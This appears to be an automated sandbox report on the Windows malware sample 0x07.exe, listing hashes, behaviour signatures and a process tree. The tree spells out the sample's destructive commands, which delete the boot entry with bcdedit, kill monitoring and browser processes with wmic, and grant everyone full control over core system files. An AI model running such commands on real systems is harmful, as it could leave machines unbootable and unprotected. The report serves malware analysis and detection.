Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
101s -
max time network
35s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
09/05/2023, 19:02
Static task
static1
Behavioral task
behavioral1
Sample
0x07.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
0x07.exe
Resource
win10v2004-20230220-en
General
-
Target
0x07.exe
-
Size
247KB
-
MD5
733eb0ab951ae42a8d8cca413201e428
-
SHA1
640ffb3ee44eb86afaea92e6c5aa158a5d4aafd1
-
SHA256
52d6d769eb474d4138ac31e05634a6ca7a4ebef5920f8356c1cd70d9fa42c2fb
-
SHA512
c7cdf77aa881c5dbb2abf17913dbf645fe88e16fa11fa055392d36ccf936fc43050c48feb631e193fe044123a190f123d2d6ff12234c0ff7c8c7c6e290209d8f
-
SSDEEP
3072:xaWEHnqlm+0FEaJSq6+ouCpk2mpcWJ0r+QNTBfZnazJ9k3kxMC+89+aPyXiwQ9M1:cWCMm8aMldk1cWQRNTBhz3Yz/qc9M1
Malware Config
Signatures
-
Possible privilege escalation attempt 25 IoCs
pid Process 1860 takeown.exe 1920 takeown.exe 904 takeown.exe 1960 icacls.exe 1268 icacls.exe 300 icacls.exe 732 takeown.exe 1524 takeown.exe 848 takeown.exe 1512 icacls.exe 1436 takeown.exe 1588 takeown.exe 892 icacls.exe 1908 icacls.exe 1072 takeown.exe 268 takeown.exe 576 takeown.exe 1544 takeown.exe 2024 icacls.exe 1712 icacls.exe 2016 icacls.exe 1492 takeown.exe 864 icacls.exe 1772 icacls.exe 552 icacls.exe -
Executes dropped EXE 2 IoCs
pid Process 916 winconfig.exe 432 DetectKey.exe -
Loads dropped DLL 1 IoCs
pid Process 2004 0x07.exe -
Modifies file permissions 1 TTPs 25 IoCs
pid Process 1920 takeown.exe 1072 takeown.exe 1544 takeown.exe 1436 takeown.exe 1524 takeown.exe 904 takeown.exe 892 icacls.exe 1268 icacls.exe 732 takeown.exe 1860 takeown.exe 1492 takeown.exe 268 takeown.exe 576 takeown.exe 1588 takeown.exe 1960 icacls.exe 1908 icacls.exe 864 icacls.exe 552 icacls.exe 2016 icacls.exe 848 takeown.exe 1512 icacls.exe 1772 icacls.exe 2024 icacls.exe 1712 icacls.exe 300 icacls.exe -
Modifies boot configuration data using bcdedit 1 IoCs
pid Process 588 bcdedit.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 0x07.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 432 DetectKey.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 1072 WMIC.exe Token: SeSecurityPrivilege 1072 WMIC.exe Token: SeTakeOwnershipPrivilege 1072 WMIC.exe Token: SeLoadDriverPrivilege 1072 WMIC.exe Token: SeSystemProfilePrivilege 1072 WMIC.exe Token: SeSystemtimePrivilege 1072 WMIC.exe Token: SeProfSingleProcessPrivilege 1072 WMIC.exe Token: SeIncBasePriorityPrivilege 1072 WMIC.exe Token: SeCreatePagefilePrivilege 1072 WMIC.exe Token: SeBackupPrivilege 1072 WMIC.exe Token: SeRestorePrivilege 1072 WMIC.exe Token: SeShutdownPrivilege 1072 WMIC.exe Token: SeDebugPrivilege 1072 WMIC.exe Token: SeSystemEnvironmentPrivilege 1072 WMIC.exe Token: SeRemoteShutdownPrivilege 1072 WMIC.exe Token: SeUndockPrivilege 1072 WMIC.exe Token: SeManageVolumePrivilege 1072 WMIC.exe Token: 33 1072 WMIC.exe Token: 34 1072 WMIC.exe Token: 35 1072 WMIC.exe Token: SeIncreaseQuotaPrivilege 1072 WMIC.exe Token: SeSecurityPrivilege 1072 WMIC.exe Token: SeTakeOwnershipPrivilege 1072 WMIC.exe Token: SeLoadDriverPrivilege 1072 WMIC.exe Token: SeSystemProfilePrivilege 1072 WMIC.exe Token: SeSystemtimePrivilege 1072 WMIC.exe Token: SeProfSingleProcessPrivilege 1072 WMIC.exe Token: SeIncBasePriorityPrivilege 1072 WMIC.exe Token: SeCreatePagefilePrivilege 1072 WMIC.exe Token: SeBackupPrivilege 1072 WMIC.exe Token: SeRestorePrivilege 1072 WMIC.exe Token: SeShutdownPrivilege 1072 WMIC.exe Token: SeDebugPrivilege 1072 WMIC.exe Token: SeSystemEnvironmentPrivilege 1072 WMIC.exe Token: SeRemoteShutdownPrivilege 1072 WMIC.exe Token: SeUndockPrivilege 1072 WMIC.exe Token: SeManageVolumePrivilege 1072 WMIC.exe Token: 33 1072 WMIC.exe Token: 34 1072 WMIC.exe Token: 35 1072 WMIC.exe Token: SeIncreaseQuotaPrivilege 908 WMIC.exe Token: SeSecurityPrivilege 908 WMIC.exe Token: SeTakeOwnershipPrivilege 908 WMIC.exe Token: SeLoadDriverPrivilege 908 WMIC.exe Token: SeSystemProfilePrivilege 908 WMIC.exe Token: SeSystemtimePrivilege 908 WMIC.exe Token: SeProfSingleProcessPrivilege 908 WMIC.exe Token: SeIncBasePriorityPrivilege 908 WMIC.exe Token: SeCreatePagefilePrivilege 908 WMIC.exe Token: SeBackupPrivilege 908 WMIC.exe Token: SeRestorePrivilege 908 WMIC.exe Token: SeShutdownPrivilege 908 WMIC.exe Token: SeDebugPrivilege 908 WMIC.exe Token: SeSystemEnvironmentPrivilege 908 WMIC.exe Token: SeRemoteShutdownPrivilege 908 WMIC.exe Token: SeUndockPrivilege 908 WMIC.exe Token: SeManageVolumePrivilege 908 WMIC.exe Token: 33 908 WMIC.exe Token: 34 908 WMIC.exe Token: 35 908 WMIC.exe Token: SeIncreaseQuotaPrivilege 908 WMIC.exe Token: SeSecurityPrivilege 908 WMIC.exe Token: SeTakeOwnershipPrivilege 908 WMIC.exe Token: SeLoadDriverPrivilege 908 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2004 wrote to memory of 916 2004 0x07.exe 29 PID 2004 wrote to memory of 916 2004 0x07.exe 29 PID 2004 wrote to memory of 916 2004 0x07.exe 29 PID 2004 wrote to memory of 916 2004 0x07.exe 29 PID 916 wrote to memory of 1484 916 winconfig.exe 30 PID 916 wrote to memory of 1484 916 winconfig.exe 30 PID 916 wrote to memory of 1484 916 winconfig.exe 30 PID 916 wrote to memory of 1484 916 winconfig.exe 30 PID 1484 wrote to memory of 432 1484 cmd.exe 32 PID 1484 wrote to memory of 432 1484 cmd.exe 32 PID 1484 wrote to memory of 432 1484 cmd.exe 32 PID 1484 wrote to memory of 432 1484 cmd.exe 32 PID 1484 wrote to memory of 588 1484 cmd.exe 34 PID 1484 wrote to memory of 588 1484 cmd.exe 34 PID 1484 wrote to memory of 588 1484 cmd.exe 34 PID 1484 wrote to memory of 1072 1484 cmd.exe 35 PID 1484 wrote to memory of 1072 1484 cmd.exe 35 PID 1484 wrote to memory of 1072 1484 cmd.exe 35 PID 1484 wrote to memory of 908 1484 cmd.exe 37 PID 1484 wrote to memory of 908 1484 cmd.exe 37 PID 1484 wrote to memory of 908 1484 cmd.exe 37 PID 1484 wrote to memory of 1588 1484 cmd.exe 38 PID 1484 wrote to memory of 1588 1484 cmd.exe 38 PID 1484 wrote to memory of 1588 1484 cmd.exe 38 PID 1484 wrote to memory of 1228 1484 cmd.exe 39 PID 1484 wrote to memory of 1228 1484 cmd.exe 39 PID 1484 wrote to memory of 1228 1484 cmd.exe 39 PID 1484 wrote to memory of 1912 1484 cmd.exe 40 PID 1484 wrote to memory of 1912 1484 cmd.exe 40 PID 1484 wrote to memory of 1912 1484 cmd.exe 40 PID 1484 wrote to memory of 632 1484 cmd.exe 41 PID 1484 wrote to memory of 632 1484 cmd.exe 41 PID 1484 wrote to memory of 632 1484 cmd.exe 41 PID 1484 wrote to memory of 1156 1484 cmd.exe 42 PID 1484 wrote to memory of 1156 1484 cmd.exe 42 PID 1484 wrote to memory of 1156 1484 cmd.exe 42 PID 1484 wrote to memory of 1472 1484 cmd.exe 43 PID 1484 wrote to memory of 1472 1484 cmd.exe 43 PID 1484 wrote to memory of 1472 1484 cmd.exe 43 PID 1484 wrote to memory of 604 1484 cmd.exe 44 PID 1484 wrote to memory of 604 1484 cmd.exe 44 PID 1484 wrote to memory of 604 1484 cmd.exe 44 PID 1484 wrote to memory of 1080 1484 cmd.exe 45 PID 1484 wrote to memory of 1080 1484 cmd.exe 45 PID 1484 wrote to memory of 1080 1484 cmd.exe 45 PID 1484 wrote to memory of 1884 1484 cmd.exe 46 PID 1484 wrote to memory of 1884 1484 cmd.exe 46 PID 1484 wrote to memory of 1884 1484 cmd.exe 46 PID 1484 wrote to memory of 988 1484 cmd.exe 47 PID 1484 wrote to memory of 988 1484 cmd.exe 47 PID 1484 wrote to memory of 988 1484 cmd.exe 47 PID 1484 wrote to memory of 1096 1484 cmd.exe 48 PID 1484 wrote to memory of 1096 1484 cmd.exe 48 PID 1484 wrote to memory of 1096 1484 cmd.exe 48 PID 1484 wrote to memory of 1860 1484 cmd.exe 49 PID 1484 wrote to memory of 1860 1484 cmd.exe 49 PID 1484 wrote to memory of 1860 1484 cmd.exe 49 PID 1484 wrote to memory of 268 1484 cmd.exe 50 PID 1484 wrote to memory of 268 1484 cmd.exe 50 PID 1484 wrote to memory of 268 1484 cmd.exe 50 PID 1484 wrote to memory of 776 1484 cmd.exe 51 PID 1484 wrote to memory of 776 1484 cmd.exe 51 PID 1484 wrote to memory of 776 1484 cmd.exe 51 PID 1484 wrote to memory of 844 1484 cmd.exe 52
Processes
-
C:\Users\Admin\AppData\Local\Temp\0x07.exe"C:\Users\Admin\AppData\Local\Temp\0x07.exe"1⤵
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Windows\Temp\winconfig.exe"C:\Windows\Temp\winconfig.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:916 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1FD1.tmp\1FD2.tmp\1FD3.bat C:\Windows\Temp\winconfig.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Users\Admin\AppData\Roaming\DetectKey.exe"C:\Users\Admin\AppData\Roaming\DetectKey.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:432
-
-
C:\Windows\system32\bcdedit.exebcdedit /delete {current}4⤵
- Modifies boot configuration data using bcdedit
PID:588
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='taskmgr.exe' delete /nointeractive4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1072
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='perfmon.exe' delete /nointeractive4⤵
- Suspicious use of AdjustPrivilegeToken
PID:908
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='mmc.exe' delete /nointeractive4⤵PID:1588
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='PartAssist.exe' delete /nointeractive4⤵PID:1228
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='control.exe' delete /nointeractive4⤵PID:1912
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='ProcessHacker.exe' delete /nointeractive4⤵PID:632
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='Security Task Manager.exe' delete /nointeractive4⤵PID:1156
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='Security Task Manager Protable.exe' delete /nointeractive4⤵PID:1472
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='CCleaner.exe' delete /nointeractive4⤵PID:604
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='procexp.exe' delete /nointeractive4⤵PID:1080
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='procexp64.exe' delete /nointeractive4⤵PID:1884
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='procexp64a.exe' delete /nointeractive4⤵PID:988
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='logonui.exe' delete /nointeractive4⤵PID:1096
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='regedit.exe' delete /nointeractive4⤵PID:1860
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='iexplore.exe' delete /nointeractive4⤵PID:268
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='chrome.exe' delete /nointeractive4⤵PID:776
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='firefox.exe' delete /nointeractive4⤵PID:844
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='opera.exe' delete /nointeractive4⤵PID:904
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='edge.exe' delete /nointeractive4⤵PID:1780
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='msedge.exe' delete /nointeractive4⤵PID:1644
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='brave.exe' delete /nointeractive4⤵PID:1340
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='wmplayer.exe' delete /nointeractive4⤵PID:1532
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='notepad.exe' delete /nointeractive4⤵PID:1512
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='notepad++.exe' delete /nointeractive4⤵PID:976
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='taskmgr.exe' delete /nointeractive4⤵PID:1316
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='perfmon.exe' delete /nointeractive4⤵PID:1268
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='logonui.exe' delete /nointeractive4⤵PID:1744
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='ProcessHacker.exe' delete /nointeractive4⤵PID:2008
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\taskmgr.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:732
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\hal.dll"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1860
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\winload.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1920
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\ntoskrnl.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1492
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\perfmon.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:268
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\resmon.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1072
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\logonui.exe4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:576
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\taskkill.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:848
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\tasklist.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1544
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\tskill.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1436
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\logonui.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1588
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Program Files\Process Hacker 2"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1524
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\drivers"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:904
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='taskmgr.exe' delete /nointeractive4⤵PID:1228
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='perfmon.exe' delete /nointeractive4⤵PID:1912
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='logonui.exe' delete /nointeractive4⤵PID:940
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='ProcessHacker.exe' delete /nointeractive4⤵PID:1156
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\taskmgr.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:892
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\hal.dll" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1960
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\winload.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1512
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\ntoskrnl.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1908
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\perfmon.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:864
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\logonui.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1772
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\resmon.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2024
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\taskkill.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:552
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\tasklist.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1712
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\tskill.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2016
-
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Process Hacker 2" /q /c /t /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1268
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\drivers" /q /c /t /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:300
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='taskmgr.exe' delete /nointeractive4⤵PID:1956
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='perfmon.exe' delete /nointeractive4⤵PID:520
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='logonui.exe' delete /nointeractive4⤵PID:1860
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='ProcessHacker.exe' delete /nointeractive4⤵PID:880
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1800
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\taskmgr.exe" /grant "everyone":F4⤵PID:848
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1544
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\hal.dll" /grant "everyone":F4⤵PID:844
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1380
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\ntoskrnl.exe" /grant "everyone":F4⤵PID:820
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1084
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\perfmon.exe" /grant "everyone":F4⤵PID:904
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1144
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\logonui.exe" /grant "everyone":F4⤵PID:1976
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1228
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\resmon.exe" /grant "everyone":F4⤵PID:1248
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1728
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\taskkill.exe" /grant "everyone":F4⤵PID:924
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1340
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\tasklist.exe" /grant "everyone":F4⤵PID:1816
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:632
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\tskill.exe" /grant "everyone":F4⤵PID:1552
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1540
-
-
C:\Windows\system32\cacls.execacls "C:\Program Files\Process Hacker 2" /grant "everyone":F4⤵PID:896
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1404
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\System32\drivers" /grant "everyone":F4⤵PID:892
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD5a645734f3bf4a2682cbaf546789ec0c4
SHA1fafcc11909412bf51f217e12dfaa93a15181a3e2
SHA2563b9b5b1659a881d15962541fb56638379a6e5b5d02435f8c50574ec003bc64b0
SHA512efa399503b982eda2058a70b10289275fe3c51280bdbb649be40cc3f17c6085267236dc0f6f8bbbf782105e6f5510e6dbbd97de8e87113abc1d8c340ccad9a6d
-
Filesize
87KB
MD5aba9a3cf4e1db4602c25405987b809a6
SHA16cd545ea023ce9cdfe76607c6801cc11ff7d9e80
SHA256490df924cadff4806ad1c1a261c71f7e06320826eda532394462e7ee32c570d6
SHA512e5a9e28549bab93f5cf2464707b3b46859271dea16f69e8757b00f79989b2665d3b9bc3d9794d1d9e1111f8ee03ecb933f1fadfcd2adeb695dc0fce0b8f90675
-
Filesize
87KB
MD5aba9a3cf4e1db4602c25405987b809a6
SHA16cd545ea023ce9cdfe76607c6801cc11ff7d9e80
SHA256490df924cadff4806ad1c1a261c71f7e06320826eda532394462e7ee32c570d6
SHA512e5a9e28549bab93f5cf2464707b3b46859271dea16f69e8757b00f79989b2665d3b9bc3d9794d1d9e1111f8ee03ecb933f1fadfcd2adeb695dc0fce0b8f90675
-
Filesize
139KB
MD511d457ee914f72a436fa4a8a8f8446dd
SHA1d0308ca82ed9716b667e8e77e9ae013b9af44116
SHA256c55e98b21e7e8639d4a6702de75bccc47b337bc639ea33231a507946f74964ef
SHA5124c861cb0fa7170d6c71e11b3a826d1802ff0f9d029cfefa7428655929d5bab4bf56abeeb963e4927def3e959f2d4a0f199c8c3bf3ecbef8885189a52eeef666b
-
Filesize
139KB
MD511d457ee914f72a436fa4a8a8f8446dd
SHA1d0308ca82ed9716b667e8e77e9ae013b9af44116
SHA256c55e98b21e7e8639d4a6702de75bccc47b337bc639ea33231a507946f74964ef
SHA5124c861cb0fa7170d6c71e11b3a826d1802ff0f9d029cfefa7428655929d5bab4bf56abeeb963e4927def3e959f2d4a0f199c8c3bf3ecbef8885189a52eeef666b